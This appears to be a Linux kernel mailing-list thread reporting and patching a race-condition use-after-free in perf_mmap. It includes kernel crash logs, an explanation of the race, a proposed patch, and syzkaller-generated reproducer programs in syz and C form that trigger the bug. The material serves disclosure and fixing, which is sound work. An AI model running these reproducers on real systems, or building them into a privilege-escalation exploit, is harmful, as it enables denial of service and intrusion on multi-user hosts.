// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
> Can you turn this into a patch we can apply (properly sent, real name
Hi Greg,
Sorry for not knowing the rules and mistakenly sending this to the wrong people. I have just submitted the formal patch to the perf subsystem maintainers with the correct formatting and my real name.
Thanks for the guidance!
Best regards,
Haocheng Yu
|
{
"author": "余昊铖 (Haocheng Yu) <haochengyu@zju.edu.cn>",
"date": "Sun, 1 Feb 2026 19:35:31 +0800 (GMT+08:00)",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range()) on event->rb outside the locked scope. If the event is closed or the buffer is detached concurrently, the ring_buffer's reference count can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel later attempts to access or increment it.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning, followed by a memory leak warning.
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
---------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer and then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
-----
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
